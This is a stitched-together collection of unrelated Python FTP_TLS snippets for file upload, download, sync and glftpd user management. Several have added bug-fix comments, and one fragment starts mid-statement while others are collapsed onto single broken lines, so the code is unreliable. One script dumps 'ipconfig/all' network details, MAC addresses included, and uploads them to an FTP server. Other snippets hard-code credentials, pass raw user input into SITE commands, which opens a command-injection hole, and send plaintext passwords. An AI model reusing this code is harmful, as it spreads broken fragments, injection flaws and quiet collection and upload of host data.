def sendPackagesFtp():
    """Upload new package files to the FTP server over FTPS.

    Creates /files/<strProductVer> on the server if needed, then uploads
    every file from ``packagesPath`` that is not already present remotely.

    Relies on module globals: serverFtp, userFtp, passFtp, strProductVer,
    packagesPath.
    """
    print("---- Send packages by FTP")
    global serverFtp
    global userFtp
    global passFtp
    from ftplib import FTP_TLS
    ftps = FTP_TLS(serverFtp)
    ftps.set_debuglevel(1)
    ftps.login(userFtp, passFtp)
    ftps.prot_p()  # switch the data connection to encrypted mode
    try:
        ftps.sendcmd('MKD ' + '/files/' + strProductVer)
    except Exception:
        print('Directory already exists')
    ftps.cwd('/files/' + strProductVer)
    filesListFtp = ftps.nlst()
    filesList = os.listdir(packagesPath)
    # Upload only the files that are missing on the server.
    newFilesList = [e for e in filesList if e not in filesListFtp]
    for fileName in newFilesList:
        # BUG FIX: close each local file after its upload -- the original
        # passed an unclosed open() result to storbinary and leaked the
        # handle for every uploaded file.
        localFile = open(packagesPath + '\\' + fileName, 'rb')
        try:
            ftps.storbinary('STOR ' + fileName, localFile)
        finally:
            localFile.close()
    ftps.quit()
def downloadSarZIP(value, ftpParams):
    """Fetch every '<value>_*' file from the FTP server, then delete the
    fetched files remotely.

    :param value: prefix used to match remote file names
    :param ftpParams: object carrying host / user / password attributes
    :return: list of file names that were downloaded
    """
    ftps = FTP_TLS()
    #ftps.set_debuglevel(2)
    ftps.connect(ftpParams.host)
    ftps.sendcmd('USER ' + ftpParams.user)
    ftps.sendcmd('PASS ' + ftpParams.password)

    list_of_files = []
    ftps.retrlines("NLST", list_of_files.append)
    # ...or use the existing helper
    # list_of_files = ftps.nlst()

    dest_dir = "./"
    pattern = value + "_*"

    # download files from ftp
    checkFile = []
    for name in list_of_files:
        if not fnmatch.fnmatch(name, pattern):
            continue
        checkFile.append(name)
        with open(os.path.join(dest_dir, name), "wb") as f:
            ftps.retrbinary("RETR {}".format(name), f.write)

    # delete files from ftp
    for name in list_of_files:
        if fnmatch.fnmatch(name, pattern):
            ftps.delete(name)

    ftps.quit()
    return checkFile
def copy_ftp_file(project_id, client_name, file_name):
    """Copy a file from the client's FTP directory into the local project
    input folder, renamed to <project_id>.<extension>.

    :param project_id: id of the project; used for dir and file naming
    :param client_name: remote directory (one per client) to read from
    :param file_name: name of the file to fetch from the client directory
    """
    ftp = FTP_TLS(settings.FTP_LOCATION)
    ftp.sendcmd("USER {}".format(settings.FTP_USER))
    ftp.sendcmd("PASS {}".format(settings.FTP_PASS))
    comp_logger.info(
        'Initiating ftp file transfer for file {} for client {}'.format(
            file_name, client_name))
    ftp.cwd(client_name)
    # create project input dir
    project_dir = os.path.join(settings.PROJECT_DIR, str(project_id))
    helper.create_dir(project_dir)
    # copy remote ftp file to local project folder; keep only the last
    # dot-separated component as the extension
    file_format = file_name.split('.')[-1]
    local_filename = os.path.join(settings.PROJECT_INPUT_FOLDER,
                                  '{}.{}'.format(project_id, file_format))
    if os.path.exists(local_filename):
        os.remove(local_filename)
    # BUG FIX: use a context manager so the local file handle is closed
    # even if the FTP transfer raises midway (original leaked it).
    with open(local_filename, "wb") as lf:
        ftp.retrbinary("RETR " + file_name, lf.write, 8 * 1024)
    # BUG FIX: close the control connection (original never did).
    ftp.quit()
    comp_logger.info('Completed Copying file {} for client {}'.format(
        file_name, client_name))
def corrReportDL(exp_id, vgos_tag):
    """Download the correlator report for one experiment from the CDDIS
    archive and extract it to <dirname>/corr_files/<exp_id>.corr.

    :param exp_id: experiment identifier; names the extracted .corr file
    :param vgos_tag: vgosDB tag whose first two chars are the 2-digit year
    NOTE(review): relies on module-global `dirname`; any failure inside the
    try block is reported only as "not available".
    """
    year = '20' + str(vgos_tag[0:2])  # e.g. tag '23XYZ' -> year '2023'
    tag = str(vgos_tag.rstrip())
    exp_id = str(exp_id)
    vgos_exists = []
    if os.path.isfile(dirname + "/corr_files/" + exp_id + '.corr'):
        # Already extracted previously -- nothing to do.
        print("Corr report already exists for experiment " + exp_id +
              ", skipping re-download.")
        return
    else:
        # Anonymous FTPS login to the NASA CDDIS archive.
        ftps = FTP_TLS(host='gdc.cddis.eosdis.nasa.gov')
        ftps.login()
        ftps.prot_p()
        try:
            # LIST the remote .tgz first; a non-empty reply means it exists.
            ftps.retrlines(
                "LIST /pub/vlbi/ivsdata/vgosdb/" + year + "/" + tag + ".tgz",
                vgos_exists.append)
            if len(vgos_exists) > 0:
                local_filename = os.path.join(dirname, tag + ".tgz")
                ftps.sendcmd('TYPE I')  # binary transfer mode
                lf = open(local_filename, "wb")
                ftps.retrbinary(
                    "RETR /pub/vlbi/ivsdata/vgosdb/" + year + "/" + tag + ".tgz",
                    lf.write)
                lf.close()
                tar = tarfile.open(dirname + '/' + tag + ".tgz")
                # Prefer the canonical V000 kMk4 history file if present.
                if tag + '/History/' + tag + '_V000_kMk4.hist' in tar.getnames(
                ):
                    member = tar.getmember(tag + '/History/' + tag +
                                           '_V000_kMk4.hist')
                    # Rename the member so extract() writes it as the
                    # final .corr path directly.
                    member.name = dirname + '/corr_files/' + exp_id + '.corr'
                    tar.extract(member)
                    tar.close()
                else:
                    # Fall back to the first V###.hist file in the archive.
                    file_list = tar.getnames()
                    regex = re.compile('.*V...\.hist')
                    for file in file_list:
                        if re.match(regex, file):
                            member = tar.getmember(file)
                            member.name = dirname + '/corr_files/' + exp_id + '.corr'
                            tar.extract(member)
                            tar.close()
                            break
                os.remove(dirname + '/' + tag + ".tgz")
                print("Corr report download complete for experiment " +
                      exp_id + ".")
                return
        except Exception:
            # NOTE(review): broad except -- network/tar errors are hidden
            # behind this generic message.
            print("Corr report not available for experiment " + exp_id + ".")
            return
def _open_ftp(self):
    # type: () -> FTP
    """Open a new ftp object.

    Connects, logs in, negotiates TLS data protection when available,
    and derives the control-channel text encoding from the server's
    FEAT reply (UTF8 feature -> utf-8, otherwise latin-1).
    """
    _ftp = FTP_TLS() if self.tls else FTP()
    _ftp.set_debuglevel(0)
    with ftp_errors(self):
        _ftp.connect(self.host, self.port, self.timeout)
        _ftp.login(self.user, self.passwd, self.acct)
        try:
            # prot_p only exists on FTP_TLS; plain FTP raises
            # AttributeError, which we deliberately ignore.
            _ftp.prot_p()  # type: ignore
        except AttributeError:
            pass
        self._features = {}
        try:
            feat_response = _decode(_ftp.sendcmd("FEAT"), "latin-1")
        except error_perm:  # pragma: no cover
            # Server rejected FEAT entirely -- assume the conservative
            # latin-1 encoding.
            self.encoding = "latin-1"
        else:
            self._features = self._parse_features(feat_response)
            self.encoding = "utf-8" if "UTF8" in self._features else "latin-1"
        if not PY2:
            # Rewrap the control socket with the negotiated encoding.
            _ftp.file = _ftp.sock.makefile(  # type: ignore
                "r", encoding=self.encoding)
    _ftp.encoding = self.encoding
    self._welcome = _ftp.welcome
    return _ftp
def login(self, debug=2, set_pasv=True):
    """Open an authenticated FTP_TLS session to ``self.host`` and return it.

    :param debug: ftplib debug level applied to the new connection.
    :param set_pasv: whether to use passive mode for data transfers.
    :returns: a connected, TLS-protected ``ftplib.FTP_TLS`` instance.
    """
    # Some NAT'd servers advertise an unreachable address in the PASV
    # reply, so override makepasv() to always reuse the address of the
    # control connection's peer.
    # BUG FIX: patch the class only once -- the original re-wrapped
    # makepasv on every login() call, stacking wrapper upon wrapper.
    if not getattr(FTP_TLS.makepasv, '_peer_host_patch', False):
        _old_makepasv = FTP_TLS.makepasv

        def _new_makepasv(self):
            host, port = _old_makepasv(self)
            host = self.sock.getpeername()[0]
            return host, port

        _new_makepasv._peer_host_patch = True
        FTP_TLS.makepasv = _new_makepasv

    ftps = FTP_TLS(self.host)
    ftps.set_debuglevel(debug)
    ftps.auth()
    ftps.login(self.user, self.pwd)
    ftps.makepasv()
    ftps.sendcmd('pbsz 0')  # protection buffer size, required before PROT
    ftps.set_pasv(set_pasv)
    ftps.prot_p()  # encrypt the data channel
    # (removed stray debug print left in the original)
    ftps.getwelcome()
    return ftps
def connect(velkost_ftp, port):
    """Upload ``file_to_send`` over FTPS, list the remote directory and
    return the size in bytes of the most recently added remote file.

    Relies on module globals: server, meno2, ps, my_list, file_to_send.

    :param velkost_ftp: overwritten locally; kept for caller compatibility
    :param port: TCP port of the FTP server
    """
    # BUG FIX: the original called FTP_TLS(server, meno2, ps, port), which
    # silently passed `port` as the *acct* argument and always connected
    # on the default port.  Connect explicitly instead.
    ftp = FTP_TLS()
    ftp.connect(server, port)
    ftp.login(meno2, ps)
    ftp.prot_p()
    ftp.cwd(my_list[2])
    print("Posielam subor. Cakajte prosim.")
    # BUG FIX: the original opened the file, closed it immediately, opened
    # it a second time for storbinary (leaking that handle) and then
    # called close() again on the first handle.  Open exactly once.
    obsah = open(file_to_send, 'rb')
    try:
        ftp.storbinary('STOR %s' % file_to_send, obsah)
    finally:
        obsah.close()
    print("Subor odoslany [OK]")
    print("Obsah adresara na serveri:")
    ftp.retrlines("LIST")
    size_ftp = ftp.nlst()
    velkost_ftp_subor = size_ftp[-1]  # berie posledne pridany subor zo zoznamu
    ftp.sendcmd("TYPE i")  # binary mode so SIZE reports an exact byte count
    velkost_ftp = ftp.size(velkost_ftp_subor)
    ftp.close()
    return velkost_ftp
def do_cmd(term):
    """Prompt the user for raw glftpd SITE commands and relay each one to
    the local glftpd daemon over FTPS.

    :param term: terminal object used for styled echo output
    """
    session = getsession()
    sep_ok = getattr(term, color_secondary)(u'::')
    sep_bad = getattr(term, color_primary)(u'::')  # NOTE(review): unused
    colors = {'highlight': getattr(term, color_primary)}
    echo(u'\r\n\r\n i hope you know glftpd cmds :)')
    # feel free to change these echoes to personalize your installation
    echo(u'\r\n\r\n if you dont, type quit')
    echo(u'\r\n\r\n basically all this is good for at the moment is for msg and request')
    echo(u'\r\n\r\n e.g \'msg kniffy hi\' or \'request coolthing -for:<you>\'')
    for _ in range(max_attempts):
        echo(u'\r\n\r\n{sep} tYPE cMD -> '.format(sep=sep_ok))
        handle = LineEditor(max_length, colors=colors).read() or u''
        if handle.strip() == u'':
            # Empty input: re-prompt until max_attempts is exhausted.
            continue
        # user says goodbye
        if handle.lower() in bye_u:
            return
        else:
            # do cmd
            person = session.user.handle  # NOTE(review): assigned but unused
            # session.user.handle = person
            ftps = FTP_TLS()
            #ftps.set_debuglevel(2)
            # if you broke something, uncomment this (run it directly, not from eggdrop)
            ftps.connect(
                '127.0.0.1',
                '1234')  # enter your server and port within the quotes
            ftps.login(
                'cmd', '<make this a non-sysop user please>'
            )  # enter your user and pass within the quotes (remember, not a user with privs)
            # ftps.login(person, auth)
            ftps.prot_p()  # switch to a protected (encrypted) data channel
            # Forward the raw user input as a SITE command.
            ftps.sendcmd('site ' + handle)
            echo(u'\r\n\r\n cmd sent')
            ftps.quit()
def recibir(self):
    """Receive an uploaded file, store it locally and on the FTP server,
    register it in the database and return the generated record id.
    """
    file = self.request.files['file']
    nombre = self.params['nombre']
    descripcion = self.params['descripcion']
    # Keep only the last dot-separated component as the extension.
    extension = file.filename.split('.')[-1]
    archivo = self.generar_nombre_no_repetido(extension)
    file.save(os.path.join('/tmp/', archivo))
    ftps = FTP_TLS()
    ftps.connect('192.168.1.26')
    ftps.sendcmd('USER ftp_user')
    ftps.sendcmd('PASS ftp_user')
    # BUG FIX: close the local file handle after the upload -- the
    # original passed an unclosed open() result to storbinary.
    with open('/tmp/' + archivo, 'rb') as local_file:
        ftps.storbinary("STOR " + archivo, local_file)
    id_generado = self.registrar_en_db(nombre, descripcion, archivo,
                                       extension)
    #ftps.retrlines('LIST')
    ftps.quit()
    return id_generado
def generar_nombre_no_repetido(self, extension):
    """Generate a random file name with the given extension that does not
    already exist on the FTP server, and return it.

    :param extension: file extension (without the dot) to append
    :return: the unique generated name, e.g. 'abcde.png'
    """
    ftps = FTP_TLS()
    ftps.connect('192.168.1.26')
    ftps.sendcmd('USER ftp_user')
    ftps.sendcmd('PASS ftp_user')
    while True:
        nombre_generado = self.random_word() + '.' + extension
        try:
            files = ftps.nlst()
        except ftplib.error_perm as resp:
            # BUG FIX: the original looped forever on this reply; an empty
            # directory means any generated name is free.
            if str(resp) == "550 No files found":
                print("No files in this directory")
                files = []
            else:
                raise
        if nombre_generado not in files:
            ftps.quit()
            # BUG FIX: the original never returned the generated name, so
            # callers (e.g. recibir) always received None.
            return nombre_generado
def uploadToFtp(fileList, remoteDir, host, user, password):
    """Upload each file in ``fileList`` to ``remoteDir`` on the FTP server.

    :type fileList: list
    :type remoteDir: basestring
    :type host: basestring
    :type user: basestring
    :type password: basestring
    """
    import posixpath
    ftps = FTP_TLS(host)
    ftps.sendcmd('USER %s' % user)
    ftps.sendcmd('PASS %s' % password)
    for fileItem in fileList:
        fileName = os.path.split(fileItem)[1]
        # BUG FIX: build the remote path with forward slashes --
        # os.path.join produces backslashes on Windows, which FTP
        # servers do not accept.
        remoteFilePath = posixpath.join(remoteDir, fileName)
        print('Uploading file [{0}] to ftp at [{1}]'.format(fileName, remoteFilePath))
        # BUG FIX: open in binary mode for STOR (text mode corrupts data
        # and crashes on non-text files) and close the handle afterwards
        # (the original leaked it).
        with open(fileItem, 'rb') as f:
            ftps.storbinary('STOR {0}'.format(remoteFilePath), f)
        print('Done.')
    ftps.quit()
def delete_user(term, tgt_user, point):
    """ Delete given user. You may delete yourself.

    Prompts 'y/N' at `point`; on 'y' (and unless the user is the
    protected 'anonymous' account) removes the matching glftpd account
    over FTPS, notifies the sysop, and deletes the BBS user record.

    :param term: terminal used for styled output and key input
    :param tgt_user: user record to delete
    :param point: (y, x) screen position for the prompt
    :return: True when the user was deleted, False otherwise
    """
    _color1, _color2 = [
        getattr(term, _color) for _color in (color_lowlight, color_highlight)
    ]
    lb, rb, colon = _color1('['), _color1(']'), _color1(':')
    echo(term.move(*point))
    echo(u'Delete {handle} {lb}yN{rb}{colon}{clear_eos} ?\b\b'.format(
        handle=_color2(tgt_user.handle),
        rb=rb, lb=lb, colon=colon,
        clear_eos=term.clear_eos))
    inp = term.inkey()
    echo(inp + term.move(point.y + 2, point.x))
    if inp == u'y':
        # 'anonymous' is a protected account and is never deleted.
        if tgt_user.handle != 'anonymous':
            ftps = FTP_TLS()
            ftps.connect('127.0.0.1', '1234')
            ftps.login('bbs', '<please make this a special sysop user in glftpd>')
            ftps.prot_p()  # for ssl mode
            # Remove the matching glftpd account and notify the sysop.
            ftps.sendcmd('site deluser ' + tgt_user.handle)
            ftps.sendcmd('site msg sysop user ' + tgt_user.handle +
                         ' deleted, maybe purge them too? ')
            ftps.quit()
            tgt_user.delete()
            echo(_color2('Deleted !'))
            time.sleep(1)
            return True
    echo(_color2('Canceled !'))
    time.sleep(1)
    return False
def main(handle=u''): """ Main procedure. """ # set syncterm font, if any term = getterminal() if term.kind == 'ansi': echo(syncterm_setfont(syncterm_font)) # reset handle to an empty string if it is any # of the 'new' user account alias strings if handle.lower() in new_usernames: handle = u'' user = User(handle) # create new user record for manipulation while True: display_banner(art_file, encoding=art_encoding) user, plaintext_password = do_nua(user) # user canceled. if user is None: return # confirm if prompt_yesno(question='Create account'): assert not find_user(user.handle), ( # prevent race condition, scenario: `billy' begins new account # process, waits at 'Create account [yn] ?' prompt until a # second `billy' finishes account creation process, then the # first `billy' enters 'y', overwriting the existing account. 'Security race condition: account already exists') # real_ip = getssession().addrport ftps = FTP_TLS() ftps.connect('127.0.0.1', '1234') # this can be remote ftps.login('asdf', '<please set up a glftpd user for this>') ftps.prot_p() ftps.sendcmd('site gadduser bbsuser ' + user.handle + ' ' + plaintext_password + ' *@127.0.0.1 ' ) ftps.sendcmd('site deluser ' + user.handle ) # for validation reasons ftps.sendcmd('site msg sysop ' + user.handle + ' added, please validate them ' ) ftps.quit() user.save() goto(top_script, user.handle)
class FtpService:
    """Thin wrapper around ftplib for listing and downloading files from
    an FTP or FTPS server described by an ``FtpConfiguration``.
    """

    def __init__(self, config: FtpConfiguration):
        self.config = config
        self.__connect()

    def __connect(self) -> None:
        """Open and authenticate the connection per the configuration.

        :raises UnknownFtpProtocolException: protocol is not FTP/SFTP
        :raises CannotConnectToFtpException: login was not accepted
        """
        # NOTE: "SFTP" here actually selects FTPS (FTP over TLS);
        # real SFTP (over SSH) is not supported by ftplib.
        if self.config.protocol == "FTP":
            self.ftp = FTP()
        elif self.config.protocol == "SFTP":
            self.ftp = FTP_TLS()
        else:
            raise UnknownFtpProtocolException(self.config.protocol)
        self.ftp.connect(host=self.config.host, port=self.config.port,
                         timeout=10)
        resp: str = self.ftp.login(self.config.username, self.config.passwd)
        if resp.startswith("230"):  # 230 == login successful
            logger.info("Successfully connect to FTP server")
        else:
            raise CannotConnectToFtpException(self.config)

    def read_file_items(self, path: str) -> List[FileItem]:
        """Return a FileItem for every regular file directly inside `path`."""
        files = list()
        items = list()
        self.ftp.cwd(path)
        self.ftp.dir(items.append)
        for item in items:
            name, is_file, size = self.__parse_list_line(item)
            if is_file:
                file_path = path + "/" + name
                # MDTM returns the remote modification timestamp.
                mdt = self.ftp.sendcmd("MDTM " + file_path)
                dt = self.__parse_mdt(mdt)
                files.append(FileItem(file_path, dt, int(size)))
        return files

    def download_file(self, ftp_path: str, store_path: str) -> FileItem:
        """Download `ftp_path` into `store_path` and return its FileItem."""
        a_store_path = pth.abspath(store_path)
        logger.info("Try download file from ftp \"%s\" to \"%s\"" % (ftp_path, a_store_path))
        try:
            # BUG FIX: use a context manager so the local file is closed
            # even when the transfer fails (the original leaked the handle).
            with open(a_store_path, 'wb') as out:
                self.ftp.retrbinary("RETR " + ftp_path, out.write)
        except Exception as ex:
            logger.error("Cannot download file", ex)
            raise ex
        return FileSystemHelper.read_file_item(a_store_path)

    def close(self):
        """Close the underlying FTP connection."""
        self.ftp.close()
        logger.info("Close ftp connection with server")

    @staticmethod
    def __parse_list_line(line: str) -> tuple:
        """Parse one LIST line into (name, is_file, size).

        Assumes a Unix-style listing, e.g.
        '-rw-r--r-- 1 user group 1234 Jan 01 12:00 name with spaces'.
        """
        items = line.split()
        is_file = not items[0].startswith("d")  # 'd' prefix == directory
        size = items[4]
        # File names may contain spaces: everything from column 8 onward.
        name = items[8:]
        return str.join(" ", name), is_file, size

    @staticmethod
    def __parse_mdt(mdt: str) -> datetime:
        """Parse an MDTM reply ('213 YYYYMMDDHHMMSS...') into a datetime."""
        dt = mdt.split()[1]
        # strptime replaces the original hand-rolled slicing; only the
        # first 14 digits (seconds precision) are used, as before.
        return datetime.strptime(dt[:14], "%Y%m%d%H%M%S")
import os
from zipfile import ZipFile
from ftplib import FTP_TLS

# Dump the machine's network configuration (incl. MAC addresses) to a
# file, then zip it.  Double backslashes avoid fragile '\m' sequences.
os.system("ipconfig/all>D:\\mac.txt")

with ZipFile("mac archive.zip", "w") as newzip:
    newzip.write("D:\\mac.txt")

#Write your servername, username and password in quotes
server = ''
usern = ''
passwd = ''

ftp = FTP_TLS()
ftp.set_debuglevel(2)
ftp.connect(server, 21)
ftp.sendcmd("USER " + str(usern))
ftp.sendcmd("PASS " + str(passwd))
# BUG FIX: open the archive in a context manager so the handle is closed,
# and actually CALL close() -- the original's bare `ftp.close` was a no-op
# attribute access that never closed the connection.
with open("mac archive.zip", "rb") as file:
    ftp.storbinary("STOR " + "mac archive.zip", file)
ftp.close()
except all_errors as exception05: # Other exceptions. print(exception05) logging.warning(exception05) quit() # now download and compare each file in the JSON file for FTP_FILE_JSON in FTP_FILES_JSON: info_text = ">> Check the file " + FTP_FILE_JSON["path"] print(info_text) logging.info(info_text) # get modified date from the current ftp file: # thanks to: https://stackoverflow.com/questions/20049928/created-date-of-file-via-ftp modifiedTime = FTP_CLIENT.sendcmd('MDTM ' + FTP_FILE_JSON["path"]) CURRENT_MODIFIED_TIME = datetime.strptime( modifiedTime[4:], "%Y%m%d%H%M%S").strftime("%d %B %Y %H:%M:%S") # convert date to JSON object dictionary_new = {JSON_TAG_MODIFIED_TIME: CURRENT_MODIFIED_TIME} NEW_MODIFIED_TIME = json.loads(json.dumps(dictionary_new)) # time JSON file path CURRENT_LOCAL_PATH_MODIFIED_TIME = os.path.join( DIR_OF_DOWNLOADS, FTP_FILE_JSON["id"] + "_time" + ".json") # check if the last time save exists / is different to the current modified time if not os.path.exists(CURRENT_LOCAL_PATH_MODIFIED_TIME): # save date and file because it's the first time
class ServerWatcher(Watcher):
    """Watcher implementation for the remote FTP/FTPS side of the sync.

    Scans the server recursively, keeps the File database in sync with
    what it finds, and processes queued delete/upload/download actions
    sequentially on the FTP connection's thread.
    """

    # Qt signals exposed to the UI / controller layer.
    downloadProgress = Signal((int, int,))
    uploadProgress = Signal((int, int,))
    # Si added:
    textStatus = Signal((str,))
    fileEvent = Signal((str,))
    fileEventCompleted = Signal()
    loginCompleted = Signal((bool, str,))
    badFilenameFound = Signal((str,))

    LOCATION = 'server'
    TEST_FILE = 'iqbox.test'

    def __init__(self, host, ssl, parent=None):
        """
        Initializes parent class and attributes. Decides whether to
        use `FTP_TLS` or `FTP` based on the `ssl` param.

        :param host: Location of the FTP server
        :param ssl: Tells whether the FTP needs to support TLS or not
        :param parent: Reference to a `QObject` instance a parent
        """
        super(ServerWatcher, self).__init__(parent)
        self.interval = 5000  # polling interval, milliseconds
        self.localdir = ''
        self.deleteQueue = []
        self.downloadQueue = []
        self.uploadQueue = []
        self.warnedNames = []
        self.ftp = None  # created lazily in onLogin()
        self.useSSL = ssl
        self.host = host
        self.preemptiveCheck = False
        self.preemptiveActions = []
        self.testFile = 'iqbox.test'

    @property
    def currentdir(self):
        """Returns the current working directory at the server"""
        return self.ftp.pwd()

    def setLocalDir(self, localdir):
        """
        Sets the local directory used to stored all downloaded files.
        Creates the directory if needed.

        :param localdir: Absolute path to local directory
        """
        self.localdir = localdir
        if not os.path.exists(self.localdir):
            os.makedirs(self.localdir)

    @pause_timer
    @Slot()
    def checkout(self):
        """
        Recursively checks out all files on the server.
        Returns a dictionary of files on the server with their last
        modified date.

        :param download: Indicates whether or not the files should be downloaded
        """
        # Check `self.deleteQueue`, `self.uploadQueue` and `self.downloadQueue` queues.
        # These tasks are done in queues to make sure all FTP commands
        # are done sequentially, in the same thread.
        self.deleteAll()
        self.uploadAll()
        self.downloadAll()

        # Handy list to keep track of the checkout process.
        # This list contain absolute paths only.
        checked_dirs = list()

        # Sets '/' as initial directory and initializes `downloading_dir`
        self.ftp.cwd('/')
        downloading_dir = self.currentdir
        check_date = dt.utcnow()

        sidirlist = list()

        root_cached = False
        fileC = 0
        while True:
            # Gets the list of sub directories and files inside the
            # current directory `downloading_dir`.
            self.textStatus.emit('Remote scan- Downloading folder list of ' + downloading_dir + '...')

            if root_cached and downloading_dir == '/':
                # Root listing was already fetched once; reuse it.
                dir_subdirs = saved_root_dirs
                dirfiles = saved_root_files
            else:
                dir_subdirs = self.getDirs(downloading_dir)
                if downloading_dir == '/':
                    saved_root_dirs = dir_subdirs

                # sidirlist.extend(dir_subdirs)
                self.textStatus.emit('Remote scan- Downloading files list of ' + downloading_dir + '...')
                dirfiles = self.getFiles(downloading_dir)
                if downloading_dir == '/':
                    saved_root_files = dirfiles
                    root_cached = True

            # Leading '/' in `downloading_dir` breaks the `os.path.join` call
            localdir = os.path.join(self.localdir, downloading_dir[1:])
            if not os.path.exists(localdir):
                # Creates the directory if it doesn't already exists.
                os.makedirs(localdir)

            for file_ in dirfiles:
                # `serverpath` is the absolute path of the file on the server,
                # download it only if it hasn't been already downloaded
                serverpath = os.path.join(downloading_dir, file_)
                serverpath = QDir.fromNativeSeparators(serverpath)
                server_file = File.fromPath(serverpath)
                self.textStatus.emit('Scanning remote file... ' + serverpath + '...')

                # How do we know if we should check this server file?
                # We see if the date last checked is the check start time.
                if server_file.last_checked_server != check_date:
                    # Do this process only once per file

                    # Added by Simon
                    # Give feedback on scanning of files.
                    fileC += 1
                    # NOTE(review): `fileC % 1` is always 0, so this status
                    # update never fires -- confirm intended modulus.
                    if fileC % 1 == 2:
                        self.textStatus.emit('Scanning remote files for changes, ' + str(fileC) + ' files scanned.')

                    # STEP: IS THIS THE FIRST TIME WE SAW THE FILE, OR WAS IT ALREADY IN OUR DB?
                    just_added = not server_file.inserver

                    # STEP: IF ITS A NEW FILE, ENSURE WE DONT WANT TO SKIP IT
                    # Example: If it's a temporary file, or a Unix file with a name we don't support.
                    if just_added:
                        filename = os.path.basename(serverpath)
                        if platform.system() == 'Windows':
                            # Windows cannot store files whose names contain
                            # any of these characters.
                            badName = False
                            for chr in ['\\', '/', ':', '?', '"', '<', '>', '|']:
                                if chr in filename:
                                    badName = True
                                    break
                            if badName:
                                if filename not in self.warnedNames:
                                    self.warnedNames.append(filename)
                                    self.badFilenameFound.emit(filename)
                                continue

                    # STEP: ASSUMING THE FILE DID EXIST IN OUR DB, LETS SAVE THE LAST MODIFICATION DATE
                    lastmdate = server_file.servermdate

                    # STEP: SAVE THE MOD DATE TO A VARIABLE
                    # Now we get the last mod time.
                    # We expect this to work fine since this file
                    # was found on the server
                    servermdate = self.lastModified(serverpath)

                    # STEP: SET BOOL SHOWING THAT IT WAS ON THE SERVER, SINCE WE KNOW IT IS.
                    server_file.inserver = True

                    # STEP: SET THE TIME THE FILE WAS LAST CHECKED TO THE SCAN START TIME
                    server_file.last_checked_server = check_date

                    # STEP: SET THE MOD DATE IN THE DATABASE TO THE ONE WE JUST GOT
                    server_file.servermdate = servermdate

                    # STEP: SAVE THIS CHANGE TO THE DATABASE
                    server_file.session.commit()

                    delta = 0
                    if server_file.inlocal:
                        delta = server_file.timeDiff()

                    # Emit the signals after the attributes has been set and committed
                    if just_added is True:
                        self.fileAdded.emit(ServerWatcher.LOCATION, serverpath)
                    elif server_file.servermdate > lastmdate or delta < -Watcher.TOLERANCE:
                        self.fileChanged.emit(ServerWatcher.LOCATION, serverpath, False)
            #END FOR

            self.textStatus.emit('Remote scan- Finding next folder...')

            dir_ready = True
            for dir_ in dir_subdirs:
                # `dirpath` is the absolute path of the subdirectory on the server,
                dirpath = QDir.fromNativeSeparators(os.path.join(downloading_dir, dir_))
                # `downloading_dir` is ready only when all its subdirectory are on the
                # `checked_dirs` list.
                if dirpath not in checked_dirs:
                    # Found one subdirectory that is not on `checked_dirs`,
                    # will process it in the next iteration.
                    downloading_dir = dirpath
                    dir_ready = False
                    break

            if dir_ready is True:
                # All subdirectories of `downloading_dir` are already in `checked_dirs`
                if downloading_dir == '/':
                    # All directories ready and at '/', means checkout is complete
                    # So, exit the main While loop!!
                    break
                else:
                    # Not at '/'. Current directory is ready so is appended to `checked_dirs`
                    # Back one directory to find directories that are not in `checked_dirs`
                    checked_dirs.append(downloading_dir)
                    downloading_dir = os.path.dirname(downloading_dir)
                    self.textStatus.emit('Remote scan- Found Folder...')
        ##### END OF WHILE ################

        ###################################################################
        # Deleted files are the ones whose `last_checked_server` attribute
        # didn't get updated in the recursive run.
        session = Session()
        deleted = session.query(File).filter(File.last_checked_server < check_date).filter(File.inserver == True)
        for file_ in deleted:
            self.fileDeleted.emit(ServerWatcher.LOCATION, file_.path)

        # Wraps up the checkout process, commits to the database.
        session.commit()

    @Slot()
    def onLogin(self, username, passwd):
        # Connect (lazily creating the FTP/FTP_TLS object) and log in,
        # then run write-permission and MFMT capability tests before
        # reporting the result through `loginCompleted`.
        ok = True
        msg = ''
        error_msg = 'Login failed.'
        try:
            if not self.ftp:
                self.ftp = FTP_TLS(self.host) if self.useSSL is True else FTP(self.host)
            loginResponse = self.ftp.login(username, passwd)
        except socket.gaierror:
            # Hostname did not resolve; drop the half-built connection.
            self.ftp = None
            ok = False
            msg = 'Server address could not be found.'
        except (error_perm, error_reply):
            info = traceback.format_exception(*sys.exc_info())
            for i in info:
                sys.stderr.write(i)
            ok = False
            msg = error_msg
        else:
            if '230' in loginResponse:
                # 230 == login successful.
                ok = True
            else:
                ok = False
                msg = error_msg

        if ok:
            # Logged in. Now let's do compability tests.
            if not self.testPermissions():
                # User doesn't have write permissions, don't bother doing next test.
                ok = False
                msg = 'It seems like you do not have write access to this server.'
            else:
                # Permissions test passed, now let's test MFMT for timestamp modification.
                if not self.testMFMT():
                    ok = False
                    msg = 'This server does not support timestamp modification\n \
                           need by this application.'

        self.loginCompleted.emit(ok, msg)

    def getFiles(self, path):
        """
        This method simply wraps the `nlst` method with an exception handler,
        and returns an empty list in case an exception is caught.

        :param path: Relative or absolute path on the server
        """
        try:
            nlst = self.ftp.nlst(path)
            dirs = self.getDirs(path)

            # Files are items in nlst that are not in dirs
            files = [item for item in nlst if os.path.basename(item) not in dirs]

            return files
        except:
            # NOTE(review): message says getDirs but this is getFiles.
            print 'Exception in ServerWatcher.getDirs'
            info = traceback.format_exception(*sys.exc_info())
            for i in info:
                sys.stderr.write(i)
            return []

    def getDirs(self, path):
        """
        Retrieves a list of the directories inside `path`,
        uses `retrlines` and the LIST command to retrieve the items.

        :param path: Relative or absolute path on the server
        """
        dirs = list()

        def handleLine(line):
            """
            Recieves a line from the LIST command.
            This function is meant to be used as callback for the `retrlines` method.

            :params line: Line from the LIST command
            """
            if line.startswith('d'):
                # Only lines starting with 'd' are directories
                # Parse the directory out of the line; lines look like:
                # 'drwxrwxrwx   1 user     group           0 Jun 15  2012 dirname'
                dirname = line[55:].strip()
                if dirname != '.' and dirname != '..':
                    # Ignoring '.' and '..' entries
                    dirs.append(dirname)

        try:
            self.ftp.retrlines('LIST %s' % path, handleLine)
            return dirs
        except:
            print 'Exception in ServerWatcher.getDirs'
            info = traceback.format_exception(*sys.exc_info())
            for i in info:
                sys.stderr.write(i)
            return []

    @upload_test
    def testPermissions(self):
        # For interface purposes. upload_test takes care of everything.
        return True

    @upload_test
    def testMFMT(self):
        # Absurd date to test whether the change really happened.
        time = dt.utcfromtimestamp(100000000)
        try:
            self.setLastModified(self.testFile, time)
            otherTime = self.lastModified(self.testFile)
            diff = (time - otherTime).total_seconds()
